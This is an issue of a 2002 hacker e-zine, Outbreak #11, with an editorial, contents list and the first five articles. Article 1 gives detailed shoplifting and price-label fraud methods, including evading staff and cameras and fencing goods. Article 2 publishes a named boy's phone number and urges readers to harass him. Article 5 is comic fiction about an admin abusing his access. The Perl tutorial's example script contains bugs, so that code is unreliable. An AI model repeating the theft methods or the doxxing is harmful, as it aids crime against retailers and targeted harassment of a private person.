Copy Link
Add to Bookmark
Report
Outbreak Issue 11
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
November 2002 - Issue #11 Outbreak Magazine - v11.0
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
"You think you need shit? That your entitled to
it? Think again, fucking earn it. Stop being
a begging little bitch and go out and take whats
yours. Begging is the biggest sign of how little
you know."
- Squirl
[editorial]
Hey everyone. Welcome to Issue #11 of Outbreak Magazine.
This issue is packed full of lots of good stuff. Read
this issue and learn something, and pass it on to all
of your friends. After the release of issue #10 I started
to get loads of e-mails commenting on it.. thanks to all
who enjoyed #10, and learned something from it, or even
laughed at the comical parts of it.
We welcome a load of new writers to this issue. Some of
the members of the DDP crew and freek radio have offered
to write some articles for us. You can learn more about
these guys at their websites:
www.stankdawg.com & www.oldskoolphreak.com
go give them some support.
Well, that's all for now. Hope you enjoy #11. E-mail us and
tell us what you think, or just to say hello. We like to hear
from our readers.
- kleptic <kleptic@t3k.org>
[/editorial]
[staff writers]
kleptic...............<kleptic@t3k.org>
dropcode..............<dropcode@dropcode.tk>
gr3p..................<gr3p@outbreakzine.tk>
rambox................<rambox@outbreakzine.tk>
joja..................<jojalistic@mac.com>
Turbo.................<turbo@outbreakzine.tk>
heavenly..............<jennybean@sugarpants.org>
n0cixel...............<lexi@sugarpants.org>
Timeless..............<timeless@hackstation.tk>
Lenny.................<lenny@yourmammy.com>
GPC...................<heelflip_the_biscuit_tin@hotmail.com>
nick84................<nick84@rootsecure.net>
evo255x...............<evo255x@hotmail.com>
dual_parallel.........<dual_parallel@hotmail.com>
StankDawg.............<stankdawg@hotmail.com>
Bi0s..................<bi0s@StankDawg.com>
Captain B.............<Captain_B@hackernetwork.com>
[/staff writers]
[shout outs]
All @ #outbreakzine on any dalnet server, phonelosers.org,
scene.textfiles.com, dropcode.tk, fwaggle.net, dsinet.org,
ameriphreak.com, stankdawg.com, oldskoolphreak.com,
sugarpants.org/heavenly, kleptic.tk, guruworld.org,
dark-horizon.org, sugarpants.org, Everyone that helped
out with this issue of Outbreak.
You all rule!
[/shout outs]
[contact us]
ÜßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÜ
\-Û http://www.outbreakzine.tk Û-/
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
Vist Us On IRC @ irc.dal.net
Join #outbreakzine
Send all articles for submission to:
kleptic@t3k.org
[/contact us]
ÜÜܲ ± ÞÛÜÜ ÜÜÛÝÜÜÜÛÜ ÜÜ ÜÜÜ
ÛÛßß² ÜÛÜ Ü ÜÜ ÜÜÜß²ÛÛÛÝßÞÛßßÛÞÛÛßÛ°Û°ÛÜÜÜÜÜÛÝ
ÜÝ ÛÛ Ûß±ßÛÞÛÛßÛ°ÛÝ ÞÛÛÝ ÞÛÜÛ ÛÛ ßÛÛÝß²Û²ÛÝß ÞÜ°
ß²²²Ûßß ß ÞÛÝ ÛÜ°ÜÛ ÛÛ ßÛÛÝ ÛÛÛ ÞÛ ÜÜÛ±Ü ÜÛÛ ÞÛ°Ý ß ßßÛ²²²ß
²² issue ÛÛÜܱßÛß ÜÛ±Û ÜÛÛ ßÛÛÛß ÛÛÛÛ-fwaggle ÛÛÛ november ²²
²Ý #11 ßßß² ± ßßßßß 2002 Þ²
²Ý Þ²
²Ý file description author Þ²
°Ý ~~~' ~~~~~~~~~~' ~~~~~' Þ²
°Ý Þ²
±Ý [00] Editorial kleptic Þ²
±Ý [01] How To Local Engineer Sandman Þ²
°Ý [02] Pac Man Ninja kleptic Þ²
°Ý [03] The Art of Perl v0.1 buffer0verflow Þ²
°Ý [04] Linux PCI Modems: A Broken Myth magickal1 Þ²
²Ý [05] Bastard Admin From Hell GPC Þ²
²Ý [06] Telephone Directory DoxBot Þ²
²Ý [07] Want admin on phpBB 2.0.0? nick84 Þ²
²Ý [08] Homework Help Asphalt Jones Þ²
²Ý [09] Basic Directory Transversal StankDawg Þ²
²Ý [10] A Small Look at Xbox LIVE Turbanator Þ²
²Ý [11] GPC's Poetry Corner GPC Þ²
²Ý [12] A Bitch Slap For Newbies evo225 Þ²
²Ý [13] TAR - Telco Acronym Reference dual_parallel Þ²
²Ý [14] E-Mail Forgery Bi0s Þ²
²Ý [15] The Hayes Modem Command Set magickal1 Þ²
²Ý [16] PRINGLES: Sour Cream & Onion rambox Þ²
²Ý [17] Executioner Box II Captain B Þ²
²Ý [18] Conclusion Outbreak Staff Þ²
²Ý Þ²
Û²Ü Ü²Û
ß²Ûßßßß ß ß ßßßßÛ²ß
Þ Ý
[video notice]
windows users: (win98 or higher) you can open these files in notepad,
and set your font to terminal, size 9. if you prefer console or
MS-DOS, then just open it in MS-DOS editor, making sure if you're
using windows that you hit ctrl+enter to make it full screen.
linux users: view in console using an editor such as joe, or use
less -R <filename>. x windows users can view by using a font such as
nexus, or the terminal.pcf font that fwaggle created but lost.
[/video notice]
[legal notice]
all texts used in this magazine are submitted by various contributors
and to the best of our knowledge these contributors are the rightful
copyright owners. feel free to redistribute this magazine in it's
entirety, but you may not redistribute or reproduce parts of this
publication without express permission from the staff.
[/legal notice]
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 1 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
How To Local Engineer
---------------------
By: Sandman
Disclaimer: Don't take us seriously.. and don't be stupid.
This is a doc about how to scam shit up in 'yo hood'. There are several
parts to this txt so that i may be 'mo spic-efic' fo each scam.
Part 1. DvD / console game "ripping"
Tools: Flat Box Knife - ie. the ones people use in grocery stores, about
3 inches long that pop's a standard razor blade's corner out to cut.
Hook Blades - Used for cutting and trimming roofing, carpet,
flooring, and cartons without damaging the surfaces
below.
Info: The hook lades will not fit into the flat box knife 'without' a
little help...... dont make the 'sleeve' for the box blade too big
because it will become loose, but a pair of pliers can always help
that issue. You dont 100% need the special blades, the others will
do, but it's like not neeeeding shoes, shoes are better.
How to: This works for any standard dvd type box. If you run into dvd's in
the big clear plastic boxes this wont work, but a '5-fingered'
opener will or magnet type thing (at hollywood video) will. If you
notice the odd bends in the corner that look like a V (the folds
part) from the top of the case you can pop the corner into this fold
and pull this will cut the bend in the plastic all the way to the
bottom and hopefully all the way off. You can then lift the front
cover up enough to pop out the disk. Make sure the disk doesnt have a
clear plastic coat with 2 metal strips across the disk (block buster).
Take the popped box and place it discretely behind the nearest other
dvd box. When you go into an establishment it is best to have at least
2 people. 1 for watching and 1 for cutting. When you go into the store
count the number of workers in the store to better keep tabs on them.
If you wear a hat and stand close to the isle you mostly cannot be
seen by the cameras if there are any and no one should even notice
until you are way gone from the store. The best way to leave is to
ask some dumb ass question like "uh do you rent gameboys" and they of
course dont so them you must be disappointed and leave. It's best to
not take in any personal effects (ie. wallet, id, car keys exc.) just
incase they try to get you, your a no body. Allot of the rental stores
will also have preowned or new to sell stuff as well. These items are
usually not secure at all or much less secure. BB has preowned's that
are highly secured by a sticker I can cut with my thumb nail.
Part 2. Price Check Please
Tools: Razor Blade - The utility type, usually rectangle with an 'atomic number
13' rail at the top.
Glue - I had the best luck with 'Quick Tight' super glue, but have
considered rubber cement for easy removal.
Info: Usually these items can be obtained from with in the store. Remember you
will eventually be caught, dont waste your chances lifting a 1cent razor.
How to: SKU's
Go to any store the uses electronic registers (wal-mart, meijers, target,
exc.). Cut the sku off of a much cheaper similar item and glue it over
the SKU of your very pricey item. Using this you must use your brain's
and have allot of courage. Just remember, the person checking your stuff
is some 16 y.o. grocery checking dumb ass. You must try to make it
something that either the same thing but cheaper or looks like it could be
the same thing. For example: New Nike MJ's... 200$'s... clearance shitty
nike's... 20$'s... 'shitty new MJ clearance shoes, 20$'s a savings of 180$'s.
Make sure the cashier doesn't know that MJ's are. As far as for cardboard
boxed item's, you halft to cut the sku from the box and then place it neatly
over the existing sku. this works well if you pick up the cheep item and
walk around with it in your cart and then neatly take the sku off. Then drop
off the cheep box and decide on a more expensive box and place it into your
cart. Then add the correct amount of glue and stick on the new sku. When
checking out, choose the dumbest looking checker (usually the longest line)
and go there. If the box is big enough leave it in the cart so they cannot
read the sides. then they will use the scan gun to scan it. Do not try this
with something that has a serial number for them to scan unless the item
that you 'made' it doesnt have a serial number and you can remove the serial
number from the outside of the box. If you dont then they will see the serial
number and expect to scan it or if it needs one and they do scan it it will
come up wrong. There are 2 ways to fence these ill-gotten-gains. The first
is to remove the sku you added (easiest with rubber cement) and try to return
it to a store that either sells this or the same type of store (k-mart exc.)
that you got this from. most of the time with out a receipt they will give
you a gift card to spend in the store. The other thing to do is to pawn it
or sell it to re-tool or some foo who wants it. if you pawn it, ensure you
are 'not you' and the 'not you' has owned it for like 6 months or something.
Also you can just swap the box of what you want for the one you want to pay
for.
The only other way I can say to do a price change good is to go to a place
that has only the old school registers like hobby lobby. They use a red felt
tip pin to mark across the original tag and then pull a tag off of a on sale
item and place it onto you not on sale item.
Enjoy this information responsibility. Do not steal and drive. Stealers
General's Warning: Quitting Stealing Now Greatly Reduces Serious Risks
to Your Health. Stealing Causes Lung Cancer, Heart Disease, Emphysema
and May Complicate Pregnancy.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 2 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Pac Man Ninja
=============
By: kleptic <kleptic@grex.org>
http://www.kleptic.tk
AIM: kl3ptic
---
Some kid messaged me on AIM wanting me to harass this kid..
he gave me his phone number and everything. So I went to work.
---
kl3ptic: Blaine.. my man.
kl3ptic: whats going down?
KoNkReTeEleMeNt: who is this
kl3ptic: Nick you silly bastard
kl3ptic: heh
kl3ptic: whats up?
KoNkReTeEleMeNt: well then why did u im me on the other name
kl3ptic: cause im an elite ninja.. why else?
kl3ptic: dont be a dipshit blaine.
kl3ptic: say
kl3ptic: we getting together this weekend?
kl3ptic: to party like a mother fucker?
KoNkReTeEleMeNt: who is this
kl3ptic: i just told you .. did you get your head beat in as a 4 year old?
kl3ptic: its fucking Nick
kl3ptic: mullet and all dude
KoNkReTeEleMeNt: nick who
kl3ptic: what do you mean nick who?
kl3ptic: quit being a dick
kl3ptic: hey, i got pac man arcade classic dude
kl3ptic: you in?
kl3ptic: its the shit
kl3ptic: not that fucking mrs. pac man bull
kl3ptic: all out PAC MAN
kl3ptic: you down with this shit?
KoNkReTeEleMeNt: nick that hangs out with andrew
kl3ptic: c'mon Blaine.. don't be a pansy ass.
kl3ptic: Pac Man Blaine
kl3ptic: Pac to the mother fucking Man
KoNkReTeEleMeNt: u quit fucking with me yo
KoNkReTeEleMeNt: who to the mother fuck is this
kl3ptic: DUDE. I'm not fucking with you..
kl3ptic: Are you scared of my pac man ninja skills Blaine?
kl3ptic: You think you can take me in Pac Man?
kl3ptic: Oh OH! I think not my friend!
KoNkReTeEleMeNt: dude get a life
kl3ptic: hey dude. If you're scared. That's cool.
kl3ptic: I mean, i would be scared too.. if i had to take on the fucking PAC MAN NINJA!
kl3ptic: damn straight
KoNkReTeEleMeNt: oh oh im not scared
kl3ptic: right ;-)
kl3ptic: you're pissing your little cammo panties
kl3ptic: c'mon blaine.. lets pac man this shit up
kl3ptic: lets do this old school
KoNkReTeEleMeNt: yo fuck u kid
kl3ptic: like willy from the wizard!
kl3ptic: yeah!
kl3ptic: hey man. you a little scared?
kl3ptic: little yellow stripe down your pac man wussy back?
kl3ptic: thats cool
kl3ptic: Fear my Pac Man ninja skills
kl3ptic: cause when those Ghosts come up
kl3ptic: i fucking chomp those bitches
kl3ptic: left and right
kl3ptic: fear
KoNkReTeEleMeNt: ok then tell me the last name
kl3ptic: lowwer or how ever you spell it
kl3ptic: bizatch
KoNkReTeEleMeNt: no urs bitch
kl3ptic: You don't need my name. You just address me as "Pac Man Ninja"
kl3ptic: oh yes.
kl3ptic: I'll Ninja spike your ass back to pac man land bizatch!
kl3ptic: make you shit your little cammo panties
KoNkReTeEleMeNt: yo if this is brian ill strait fuck u up bitch
kl3ptic: brian?
kl3ptic: this is Nick you little Mrs. Pac Man pansy
KoNkReTeEleMeNt: yo who ever it is dont let me cacth ur bitch ass
kl3ptic: you wont be able to.
kl3ptic: cause im a freaking ninja
kl3ptic: pac man style
kl3ptic: just when you think you're alone.. . BAM.. ninja spike to the back of the skull
kl3ptic: drop kick your nuts.. make you piss your camo panties
KoNkReTeEleMeNt: ok peace u want to talk some shit here is my number call me now bitch 789 8203
kl3ptic: i already got it
kl3ptic: and i will call ;-)
=============================================================
After I posted his number on my website, I guess he now gets
a shit load of calls a day. And I heard one story about how
Blaine got grounded because someone socialed his parents into
thinking that he was an "AOL Hax0r." If you hit this kid, let
me know what you did to him, and how he reacted.
if you want to harass him:
Blaine Lowwer
410-789-8203
=============================================================
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 3 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
The art of perl v0.1
by buffer0verflow.
In this paper I will try to explain the basics of perl, and why
I think its so popular. By the end of this paper the reader should
have a basic understanding of perl's data types, minimal regex,
and perl syntax. At the end of the paper I will write a demonstration
program, To put it all together.
1. What is perl?
Perl is a interpreted programming language. Perl stands for
Practical Extraction and Report Language, a.k.a. Pathologically
Eclectic Rubbish Lister. Perl was developed by Larry wall.It includes
many facilities reminiscent of awk. It is considered by sys-admins to be the
language of choice. Why? probably cause it can interact easily with
the system. And deals well with text, and many other things.
As my friend once put it, "Perl is like a hamster with a swiss army knife."
Perl was also gonna be named after Larry's wife. Then he decided against it. And
moved onto the name 'Pearl' which was a no-go due to there being another
language named pearl. So he chose perl.
2. Why its popularity?
Alot of perl's popularity comes from the way it can handle text. Perl
deals with text excellently. I don't think there is a language that can
match perl's text capabilities. Another reason is it allows you to be sort of
apathetic with your code. Perl is a pretty loosely typed language. It doesn't
hold back much. It does what you tell it to do. Even if it doesn't like it.
As I said before it deals with text excellently as you will later see. So
sys-admins enjoy being able to parse through log files, and taking out the data
they want. And leaving the data they don't need. Another reason, is it has a
smooth learning curve. You can learn just the minimal basics and still be able
to produce some useful programs.
3. Now onto the basics of the language.
Now we'll get into the basics of perl. Alot of people say they can tell alot
from the language by seeing how simple the hello world looks. Well in perl
I don't think it gets any easier. Here is the hello world in perl:
#!/usr/bin/perl
print "Hello World\n";
The '\n' of course means to skip to the next line. Just like in many other
languages. The first line sometimes referred to as the shebang line. Just makes
it so you don't have to type perl hello.pl. You can just type the name of the
file:
#./hello
of course it has to have execute permissions. Next we will deal with
some data types. There is really only 4 basic types they go as follows:
$string = "l33t"; # A string.
$num = 1337; # A number notice they can each use the '$'
@array = (10, 12, 12); # an @rray.
%hash = (
age => 18,
name => "Harry",
); # this is a hash which i will explain in a sec.
Perl has the data type hash. Which is sort of like a structure of data.
Accept it uses 'keys' to access the data. So say we wanted to get the
value of what 'age' holds. We do that as follows:
print $hash{age}; # would print '18'.
$age = $hash{age}; # or we could store its value in the variable $age.
Notice we used % when declaring our hash. But when you access it you use
$hash{keyhere} its the same with arrays. As so:
@array = (10, 20, 30, 40);
print $array[0]; # prints the first value of the array '10'.
Remember the array's subscript (value) starts at 0 and goes up. Not 1.
You could also print the whole array if you wanted. As so:
print @array; # prints all the values in the array all together.
We could make that look cleaner alot of ways. Perl has a foreach control
statement. We could do:
foreach $value (@array) {
print ("$value\n");
}
Which loops through the array and stores each value in the scalar variable
$value. Now we'll go on to some user-defined functions. A function is just
a piece of code that usually has a specific job, like adding up variables
passed to it etc. You declare a function with the sub keyword as follows:
sub add {
return $a + $b;
}
That returns one value, which would be whatever is in $a + whatever is in $b.
Full example:
$a = 10;
$b = 20;
$c = add($a, $b);
print("\$c holds the value $c now\n");
sub add {
return $a + $b;
}
The \ is for telling perl we want to print the $ symbol so we don't get it
confused with the actual value in the variable. You can pass multiple things
to functions, and perl can handle it pretty well. As long as the code deals
with the variables correctly. And you might have noticed perl doesn't care
when you declare variables. Like in some other languages you have to initialize
them before their used. Perl don't care. Unless of course you tell it to.
we can do that as so:
use strict;
my($a, $b);
$a = 12;
$b = 12;
print("$a $b\n");
The use strict in the top of the code, puts the strict module into play.
Which means we have to declare all of our variables before using them.
The advantages are the code tends to run faster with strict. Disadvantanges
It kind of bites declaring them before we use them. But its a good idea to use
them. The my() function is used to declare your variables. The use functions
puts the given module into play, in our case strict. But there are literally
thousands of different modules out there. Some include Net::IRC, IO::Socket;
CWD, and many others.
Now its time for some simple regex. Regular expressions. Are useful for finding
patterns in text, strings. Even from sockets. To show a brief example:
$string = "Where the hell is the cake";
if($string =~ /cake/i) {
print("Found..\n");
}
else {
print("I didn't find it..\n");
}
Running that program will print Found.. since 'cake' is contained in the string.the ~
is a regex pattern telling perl we want to search for something /cake/
is the pattern telling perl we want to search for 'cake', and the i means
ignore case. So, if it was say CAKE, or Cake, it will still match it since it
ignores the case of the word. You can see how useful regex'es can be. Say
we had a file, we wanted to find a pattern in it. Regex's would do the job.
To sum it up we'll write a program called 'parse'. Which will take a specified
pattern, and search for all occurences, and 'parse'(remove) it from the file.
This can be useful. Say your on IRC and someone pastes you some code you want
to run. Of course the <nickname> stuff will be in there. And it would be
very time consuming to go through and delete each manually. So we'll
throw that data into a file, tell perl to open it up, find the pattern, and
remove the pattern if it finds it. The code goes as follows. I will explain
it in detail afterwords.
# parse.pl
$file = shift;
$pattern = shift;
$file2 = "parsedata.txt"
die("usage: <file> <pattern>\n") unless defined($file) && defined($pattern);
open(FILE, "$file") or die("Cannot open file\n");
open(FINAL, "$file2") or die("Can't open");
@arr = <FILE>;
foreach $line(@arr) {
if($line =~ /$pattern/i) {
$parsd = (split(/$pattern/, $line))[1];
print FINAL $parsd;
}
}
close FINAL;
close FILE;
print("New parsed data is in $file2\n");
$time = localtime();
print("Completed on $time\n");
And thats it. We'll start at the beginning $file = shift. This tells perl to get
the file name on the command line. ie: when the program is being ran.
Same goes for $pattern. If those values aren't defined the program will die
printing the usage. A few new keywords were used. unless is another control
structure which is pretty self-explanatory. defined() takes a value as its
arguments. If its not defined then it will do as told. In our case die.
die() is basically a function to signal an error. If the values are defined
it moves on and opens the $file specified. If there is a problem opening it
it will die. If all goes well it moves on. The @arr = <FILE>; stores all the
data in the file into the array. Then we move on to the foreach it says.
for each line in the array search for the specified pattern is the pattern exists
parse it out uses the split function. which removes the $pattern.
Then it prints the parsed information into $file2 which will contain what we want.
Then it closes both of the files. and tells us the new data is in file2.
Then a pointless addition $time = localtime(). The localtime() function is also
pretty self-explanatory. Then it tells us its done. That's that. The program
should work on any platform. Perl is very portable. The program could have been
done in various ways. Perl uses the TIMTOWTDI attitude. There is more than one
way to do it.
5. Summary.
Hopefully you gained something from this tutorial. If not, I am a loser, and
should be shot with a 9. If you have any questions, comments or whatever, you
can email me at joey@hackernetwork.com. You can also find me on irc. The next perl
tutorial will contain more advanced information with a demonstration on sockets.
We'll be creating a simple IRC bot. That's all for now. Peace.
buffer
email: joey@hackernetwork.com
AIM: buffer18@hotmail.com
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 4 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
Linux PCI Modems: The Myth Is Broken
====================================
By: Magickal1
I have seen many pages written for the modem and its installation but
they mainly cover the ISA modems. This is for the PCI Modem. Now if you
are looking here because have a Win-modem I'm sorry, But I cant help you.
Because todays machines are using PCI boards and ISA is a thing of the
past, I have written this in hopes of helping a few souls out their that
need it. I know that High-Speed access is the rage, and many think that
OMG your still on a Dialup, get High Speed Access (HSA). Well this is not
an option for many so the tried and true modem is the only way.
Most other tutorials will tell you that PCI wont work. Wrong! There
are several True modems out there that do. The Action-Tec Call Waiting
Modem and the US Robotics 56k PCI Modem are 2 that I have used personally
that work just great. With that said, the following instructions are based
on those 2 modems.
The best thing to do is to read the box that the modem comes in to make
sure that it's NOT a Modem-Emulator or the so-called Win-modem. On to the
Nitty-Gritty.
It is assumed that you have already installed the hardware as this
paper is not intended as to tell you how to do that. It is also assumed
that your Kernel has serial support, and PPPD as well as a communication
program such as Mini-com
Log onto Linux and start a terminal session and SU as root
The modem is going to be configured based on the following files that
are assumed to be on the system
dev/ttySx or dev/cuax
If by chance they are not there you can add them by this command:
cd dev
./MAKEDEV ttySx (x=port number) ie: ./makedev ttsS4
on open Linux there is no make DEV so the command is:
mknod /dev/ttyS4 c 4 68
mknod/dev/tcua4 c 5 60
(note that in kernels 2.2.x and later the cuax have been depricated)
Next step is to create a few symbolic links
ln -s /dev/ttyS4 /dev/modem (this creates a symbolic link from the dev
ttyS4 to dev modem)
chmod 666 /dev/ttyS4
chmod 666 /dev/modem
Now lets determine what communications port the modem is on
cat /proc/pci
Look at the output and find the modem
you might see something like this:
Bus 1, device 8, function 0:
Serial controller: US Robotics/3Com 56K FaxModem Model 5610 (rev 1).
IRQ 10.
I/O at 0xecb8 [0xecbf].
Write down the first input/output (I/O) and the IRQ
now type in this command:
setserial /dev/modem uart 16550a port <your value> irq <your value>
now try it out in mini-com. If it worked add the above command to the
following file two times. as such:
in the file /etc/rc.d at the last line
setserial /dev/modem uart 16550a port <your value> irq <your value>
setserial /dev/modem uart 16550a port <your value> irq <your value>
This will insure that the modem is set every time that you boot!
Now lets set up the PPP
Is assumed that you have an ISP and valid account
You will need:
- User name (login) and password
- The Dial up Telephone number
- The IP address that's been assigned (this doesn't apply if your ISP uses
a Dynamic IP as Most Do)
- The Dynamic Name Server (DNS) addresses (you need at least one I order
to translate from URL names like www.antionline.com to the IPV4 IPV6 URL)
PPP comes with some scripts that are already made that just need to be
edited and moved a bit. You can find them on MOST systems at
/usr/share/doc/ppp-2.x.x (depending on you version of ppp)
Type in the following editing to fit your system
cp /usr/share/doc/ppp-2.4.1/scripts/ppp-* /etc/ppp
Now cd to the /etc/ppp dir and open up in a text editor the following
file.
ppp-on
Make the changes in the username password telephone numbers and such
also at the bottom of the file change the line that read /dev/ttyS0
to the tty that you system uses change the value 38400 to 115200. Save
and close
Open up the ppp-on-dialer in an editor
Change the setting after TIMEOUT from 30 to 60
Change the line that reads
exec chat -v to
exec /usr/sbin/chat -v
save and close
Open up /etc/ppp/options and make SURE that there is a line that says
LOCK This prevents other processes from accessing the modem while in use.
Save and Close
Now lets set the permissions
Make sure that your in /etc/ppp as root
Set the permissions for the scripts as follows
chmod +x ppp-o*
Now the password is stored Unencrypted (yeah, I know that's not the best
way, but hey, it works) so we are going to se the permissions on that file
to 711 (read/write/execute) for the owner and execute-only for everyone
else.
chmod 711 ppp-on
chown root ppp-on
chgrp root ppp-on
now open up /etc/resolv.conf and add in the DNS address that was
provided by your ISP
Let's make another Symbolic link for the scripts
ln -s /etc/ppp/ppp-off
ln -s /etc/ppp/ppp-off
Thing should be up and working
If you use a GUI Like X-server and KDE or GNOME you can edit the dialup
programs from the GUI interface and in a few moments be surfing the net
to you hearts delight.
Note in KDE KPPP doesn't have an entry for DEV above ttyS3 so make sure
that you use /dev/modem as we have already set the link for it
Hoped this helped and happy surfing.
°Û °Û
ÞÜ ±Û °Û °Û
ÜÛÛ ÛÜ ±Û ²Û°ÛÛÛÛß°Û ÜÜÜ ±Û ÜÜ ÜÛÛÛÜ°ÛßßßÛ°Û °Û
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±ÛÛßßßÛܱÛÛßß°ÛÜÜÜß °Û°ÛÛÛ
ÛÛ ° ÛÛ±Û ±Û ÛÛ ±Û °Û±Û °ÛÜ °ÜÛßßÛ°Û °Û
ßÛ ÛÛß °ÛÛÛ ßÛÛÜ°ÛßÛÛÛÛß±Û °ÛÛÛß°ÛÜÜÛ²°Û °Û
Outbreak Magazine Issue #11 - Article 5 of 18
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
*********************************************
* Bastard Admin From Hell *
* (Offspring of Bastard Operator From Hell) *
* *
* Written by GPC *
* On 12:40 17/09/02 *
* heelflip_the_biscuit_tin@hotmail.com *
* *
*********************************************
The following was written under the influence of the BOFH (Bastard
Operator From Hell) series of text files, written Circa.1980, about (yes
you guessed it) ..... a Bastard Operator From Hell. In this installment it
seems the BOFH got laid and has produced an offspring .... The Bastard
Admin From Hell, read on ........
Bastard Admin From Hell here, its monday, shit WILL happen.
I get in early so I can replace NT with Windows 3.1 on all the
machines. Should cause some interesting compatibility issues. Then I set up
the proxy account to run all internet traffic through the teachers demo
computer instead of our very expensive dedicated internet server, and go to
sleep in the office.
The phone rings, its the new IT teacher.
"Yes?" I answer irratably.
"Er, my internet connection is running really slowly, do you know why?"
I don't bother with the excuse cards.
"Aren't you the teacher?"
"Well yes but..."
"Then shouldn't you know?"
"Look, who do you think..."
"Shut up. Just exit Internet Explorer (suckers), wait 10 seconds and
then it should be fine"
I quickly open his account, change his homepage to www.harcoresailors.com
and go back to sleep. 5 seconds later I hear a whole class of students
jeering very loudly. What a bastard I am, and its not even 10 yet.
I get about 2 hours of shut eye before the phone rings again. Its a
user, he wants to know why the IT room door is locked. I didn't know it was
but I tell him thats its to protect the hub from transgressional static
magnification. He seems to accept it and I hang up.
I open the IT room at lunchtime because I had slept enough and reading
other people's email was getting boring. I echo a user's machine. Playing an
online RPG, the thing I hate most. The biggest waste of bandwidth since
AOL. I take control of his computer, type www.lolitasex.com into his address
bar and freeze the machine once the front page has loaded. I call the
manager and tell him to check machine 12, the machine I took over. From my
desk I hear a lot of shouting in the next room, the guy was expelled the next
day. Life's tough isn't it. I take the phone off the hook.
After using almost the entirity of the school's bandwidth to host a 128
player Unreal Tournament game for a few hours I get bored and nuke all the
players with an open port. Well, like I always say, you should never trust a
sysop running a 128 player game of UT. I decide to play the 'Chinese "And
Then" Mind Game' and put the phone back on the hook. It takes less than 30
seconds for it to ring. Its a user.
"Er, I have a problem, my terminal has totally frozen up and I have really
important work that I hasn't saved"
"And then?" is my only response. The user seems slightly thrown.
"Er, well I tried to open the task manager"
"And then?" I reply again.
"Well, er, nothing"
"And then?"
"Um, and then I called you"
"And then?"
"Uh, nothing"
"And then?"
"Is this a joke?"
"And then?"
"And then nothing!"
"And then?"
He hangs up, I check my watch, 20 seconds. Not bad, must try harder
next time. I trace the call, find out his username and e-mail him a list of
IT rules with one addition. 'Rudeness to any member of the IT staff will
result in immediate exclusion from the network.' I echo his terminal and let
him read the e-mail before deleting his account. Lunchtime.
I stroll back into my office just in time for the last computing class of
the day. I check the lesson roster and find out, much to my amusement, that
Mr.Hardcore-Sailor is teaching a load of first years on "how to use the
system", God I love the beginning of the year, so many innocent victims.
I hide my computer off the network and open up CMD.EXE. I crack my
knuckles, time to have some fun! I ponder on the best plan of attack, a
stroke of genius hits me as I pull down the password list for that class.
